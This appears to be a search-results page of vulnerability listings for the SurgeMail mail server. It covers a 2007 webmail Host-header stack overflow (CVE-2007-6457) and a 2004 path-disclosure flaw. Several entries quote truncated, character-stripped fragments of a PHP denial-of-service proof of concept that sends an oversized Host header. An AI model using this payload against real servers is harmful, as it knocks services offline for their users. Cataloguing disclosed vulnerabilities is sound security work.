7 matches found
CVE-2007-6457
Stack-based buffer overflow in the webmail feature in SurgeMail 38k4 allows remote attackers to cause a denial of service crash via a long Host header...
SurgeMail v.38k4 webmail Host header Denial of Service Exploit
No description provided by source. ?php / SurgeMail v.38k4 webmail Host header denial of service exploit tested against the windows version rgod / dl"phpcurl.so"; $url = "http://192.168.0.1"; $puf=strrepeat0xff,0xfff; $header ="POST / HTTP/1.0\r\n"; $header.="Host: $puf\r\n"; $header.="Connection...
SurgeMail v.38k4 webmail Host header crash
?php / SurgeMail v.38k4 webmail Host header denial of service exploit tested against the windows version rgod / dl"phpcurl.so"; $url = "http://192.168.0.1"; $puf=strrepeat0xff,0xfff; $header ="POST / HTTP/1.0rn"; $header.="Host: $pufrn"; $header.="Connection: Closernrn"; $ch = curlinit;...
SurgeMail v.38k4 webmail Host header Denial of Service Exploit
Exploit for unknown platform in category dos / poc ============================================================== SurgeMail v.38k4 webmail Host header Denial of Service Exploit ============================================================== 0day.today 2018-04-11...
Surgemail 38k4 - webmail Host header Denial of Service
milw0rm.com 2007-12-18...
CVE-2004-2547
NetWin 1 SurgeMail before 2.0c and 2 WebMail allow remote attackers to obtain sensitive information via HTTP requests that a specify the / URI, b specify the /scripts/ URI, or c specify a non-existent file, which reveal the path in an error message...
NetWin Surgemail 1.81.92.0 WebMail 3.1 - Error Message Full Path Disclosure
NetWin Surgemail 1.81.92.0 WebMail 3.1 - Error Message Full Path Disclosure source: https://www.securityfocus.com/bid/10483/info SurgeMail/WebMail is prone to multiple vulnerabilities. These issue result from insufficient sanitization of user-supplied data. The issues can allow an attacker to car...